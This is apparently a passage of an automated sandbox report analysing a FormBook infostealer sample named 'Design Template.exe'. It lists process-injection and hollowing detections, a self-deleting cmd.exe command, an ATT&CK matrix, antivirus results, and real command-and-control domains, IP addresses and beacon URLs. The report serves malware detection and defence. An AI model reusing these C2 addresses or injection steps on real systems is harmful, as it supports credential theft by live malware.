        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h]14_2_04550EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045046A7 mov eax, dword ptr fs:[00000030h]14_2_045046A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449EF40 mov eax, dword ptr fs:[00000030h]14_2_0449EF40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449FF60 mov eax, dword ptr fs:[00000030h]14_2_0449FF60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558F6A mov eax, dword ptr fs:[00000030h]14_2_04558F6A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451FF10 mov eax, dword ptr fs:[00000030h]14_2_0451FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451FF10 mov eax, dword ptr fs:[00000030h]14_2_0451FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA70E mov eax, dword ptr fs:[00000030h]14_2_044BA70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA70E mov eax, dword ptr fs:[00000030h]14_2_044BA70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455070D mov eax, dword ptr fs:[00000030h]14_2_0455070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455070D mov eax, dword ptr fs:[00000030h]14_2_0455070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AF716 mov eax, dword ptr fs:[00000030h]14_2_044AF716
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04484F2E mov eax, dword ptr fs:[00000030h]14_2_04484F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04484F2E mov eax, dword ptr fs:[00000030h]14_2_04484F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BE730 mov eax, dword ptr fs:[00000030h]14_2_044BE730
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C37F5 mov eax, dword ptr fs:[00000030h]14_2_044C37F5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507794 mov eax, dword ptr fs:[00000030h]14_2_04507794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507794 mov eax, dword ptr fs:[00000030h]14_2_04507794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507794 mov eax, dword ptr fs:[00000030h]14_2_04507794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04498794 mov eax, dword ptr fs:[00000030h]14_2_04498794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A0050 mov eax, dword ptr fs:[00000030h]14_2_044A0050
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A0050 mov eax, dword ptr fs:[00000030h]14_2_044A0050
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04551074 mov eax, dword ptr fs:[00000030h]14_2_04551074
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04542073 mov eax, dword ptr fs:[00000030h]14_2_04542073
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04554015 mov eax, dword ptr fs:[00000030h]14_2_04554015
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04554015 mov eax, dword ptr fs:[00000030h]14_2_04554015
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507016 mov eax, dword ptr fs:[00000030h]14_2_04507016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507016 mov eax, dword ptr fs:[00000030h]14_2_04507016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507016 mov eax, dword ptr fs:[00000030h]14_2_04507016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]14_2_0449B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]14_2_0449B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]14_2_0449B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]14_2_0449B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]14_2_044B002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]14_2_044B002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]14_2_044B002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]14_2_044B002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]14_2_044B002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov ecx, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044858EC mov eax, dword ptr fs:[00000030h]14_2_044858EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489080 mov eax, dword ptr fs:[00000030h]14_2_04489080
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04503884 mov eax, dword ptr fs:[00000030h]14_2_04503884
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04503884 mov eax, dword ptr fs:[00000030h]14_2_04503884
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C90AF mov eax, dword ptr fs:[00000030h]14_2_044C90AF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BF0BF mov ecx, dword ptr fs:[00000030h]14_2_044BF0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BF0BF mov eax, dword ptr fs:[00000030h]14_2_044BF0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BF0BF mov eax, dword ptr fs:[00000030h]14_2_044BF0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AB944 mov eax, dword ptr fs:[00000030h]14_2_044AB944
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AB944 mov eax, dword ptr fs:[00000030h]14_2_044AB944
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C962 mov eax, dword ptr fs:[00000030h]14_2_0448C962
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B171 mov eax, dword ptr fs:[00000030h]14_2_0448B171
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B171 mov eax, dword ptr fs:[00000030h]14_2_0448B171
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489100 mov eax, dword ptr fs:[00000030h]14_2_04489100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489100 mov eax, dword ptr fs:[00000030h]14_2_04489100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489100 mov eax, dword ptr fs:[00000030h]14_2_04489100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]14_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]14_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]14_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]14_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov ecx, dword ptr fs:[00000030h]14_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B513A mov eax, dword ptr fs:[00000030h]14_2_044B513A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B513A mov eax, dword ptr fs:[00000030h]14_2_044B513A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h]14_2_0448B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h]14_2_0448B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h]14_2_0448B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045141E8 mov eax, dword ptr fs:[00000030h]14_2_045141E8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AC182 mov eax, dword ptr fs:[00000030h]14_2_044AC182
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA185 mov eax, dword ptr fs:[00000030h]14_2_044BA185
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2990 mov eax, dword ptr fs:[00000030h]14_2_044B2990
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B61A0 mov eax, dword ptr fs:[00000030h]14_2_044B61A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B61A0 mov eax, dword ptr fs:[00000030h]14_2_044B61A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045051BE mov eax, dword ptr fs:[00000030h]14_2_045051BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045051BE mov eax, dword ptr fs:[00000030h]14_2_045051BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045051BE mov eax, dword ptr fs:[00000030h]14_2_045051BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045051BE mov eax, dword ptr fs:[00000030h]14_2_045051BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045069A6 mov eax, dword ptr fs:[00000030h]14_2_045069A6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454EA55 mov eax, dword ptr fs:[00000030h]14_2_0454EA55
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04514257 mov eax, dword ptr fs:[00000030h]14_2_04514257
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489240 mov eax, dword ptr fs:[00000030h]14_2_04489240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489240 mov eax, dword ptr fs:[00000030h]14_2_04489240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489240 mov eax, dword ptr fs:[00000030h]14_2_04489240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489240 mov eax, dword ptr fs:[00000030h]14_2_04489240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0453B260 mov eax, dword ptr fs:[00000030h]14_2_0453B260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0453B260 mov eax, dword ptr fs:[00000030h]14_2_0453B260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C927A mov eax, dword ptr fs:[00000030h]14_2_044C927A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558A62 mov eax, dword ptr fs:[00000030h]14_2_04558A62
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454AA16 mov eax, dword ptr fs:[00000030h]14_2_0454AA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454AA16 mov eax, dword ptr fs:[00000030h]14_2_0454AA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04498A0A mov eax, dword ptr fs:[00000030h]14_2_04498A0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A3A1C mov eax, dword ptr fs:[00000030h]14_2_044A3A1C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04485210 mov eax, dword ptr fs:[00000030h]14_2_04485210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04485210 mov ecx, dword ptr fs:[00000030h]14_2_04485210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04485210 mov eax, dword ptr fs:[00000030h]14_2_04485210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04485210 mov eax, dword ptr fs:[00000030h]14_2_04485210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448AA16 mov eax, dword ptr fs:[00000030h]14_2_0448AA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448AA16 mov eax, dword ptr fs:[00000030h]14_2_0448AA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C4A2C mov eax, dword ptr fs:[00000030h]14_2_044C4A2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C4A2C mov eax, dword ptr fs:[00000030h]14_2_044C4A2C
        Source: C:\Users\user\Desktop\Design Template.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00424EAA SetUnhandledExceptionFilter,2_2_00424EAA
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00424EBC SetUnhandledExceptionFilter,2_2_00424EBC

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeNetwork Connect: 198.50.252.64 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.gxjljc.com
        Source: C:\Windows\explorer.exeDomain query: www.betralifcannabis.com
        Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.modomo.amsterdam
        Source: C:\Windows\explorer.exeDomain query: www.bestflowersandgifts.com
        Source: C:\Windows\explorer.exeNetwork Connect: 47.105.113.141 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.2elden.com
        Source: C:\Windows\explorer.exeNetwork Connect: 14.215.190.65 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.zq2003.com
        Source: C:\Windows\explorer.exeDomain query: www.landreclaim.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.rememberingedward.info
        Source: C:\Windows\explorer.exeNetwork Connect: 156.226.160.56 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.chuanyangwenhua.com
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\Desktop\Design Template.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\Design Template.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\Design Template.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\Design Template.exeThread register set: target process: 3292Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3292Jump to behavior
        Queues an APC in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\Design Template.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
        Sample uses process hollowing techniqueShow sources
        Source: C:\Users\user\Desktop\Design Template.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1030000Jump to behavior
        Source: C:\Users\user\Desktop\Design Template.exeProcess created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'Jump to behavior
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 00000007.00000002.502832403.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
        Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00431B5C GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,2_2_00431B5C

        Stealing of Sensitive Information:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

        Remote Access Functionality:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsNative API1Path InterceptionProcess Injection512Masquerading1Input Capture1Security Software Discovery121Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information4LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385453 Sample: Design Template.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 36 yashasvsaluja.com 2->36 38 www.yashasvsaluja.com 2->38 40 7 other IPs or domains 2->40 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 9 other signatures 2->50 11 Design Template.exe 1 2->11         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\Liebert.bmp, PE32 11->28 dropped 14 Design Template.exe 11->14         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.2elden.com 156.226.160.56, 49724, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 17->30 32 www.landreclaim.com 198.50.252.64, 49725, 80 OVHFR Canada 17->32 34 13 other IPs or domains 17->34 42 System process connects to network (likely due to code injection or exploit) 17->42 21 rundll32.exe 17->21         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54 56 Tries to detect virtualization through RDTSC time measurements 21->56 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Design Template.exe35%VirustotalBrowse
        Design Template.exe100%AviraHEUR/AGEN.1106037
        Design Template.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Liebert.bmp100%AviraTR/Crypt.ZPACK.Gen
        C:\Users\user\AppData\Local\Temp\Liebert.bmp100%Joe Sandbox ML

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        2.1.Design Template.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        4.1.Design Template.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        14.2.rundll32.exe.7b4cd8.1.unpack100%AviraTR/Patched.GenDownload File
        2.2.Design Template.exe.400000.0.unpack100%AviraHEUR/AGEN.1106037Download File
        2.0.Design Template.exe.400000.0.unpack100%AviraHEUR/AGEN.1106037Download File
        14.2.rundll32.exe.4997960.5.unpack100%AviraTR/Patched.GenDownload File
        4.0.Design Template.exe.400000.0.unpack100%AviraHEUR/AGEN.1106037Download File

        Domains

        SourceDetectionScannerLabelLink
        gz01.bch.baidu-itm.com2%VirustotalBrowse
        bestflowersandgifts.com0%VirustotalBrowse
        www.realunitystudio.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://schemas.mi0%URL Reputationsafe
        http://schemas.mi0%URL Reputationsafe
        http://schemas.mi0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.zq2003.com/ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx0%Avira URL Cloudsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://schemas.micr0%URL Reputationsafe
        http://schemas.micr0%URL Reputationsafe
        http://schemas.micr0%URL Reputationsafe
        http://www.rememberingedward.info/ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA==0%Avira URL Cloudsafe
        http://www.bestflowersandgifts.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w==0%Avira URL Cloudsafe
        http://www.sexichef.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw==0%Avira URL Cloudsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.landreclaim.com/ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx0%Avira URL Cloudsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        www.zq2003.com/ma3c/0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.sci-mfg.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ==0%Avira URL Cloudsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
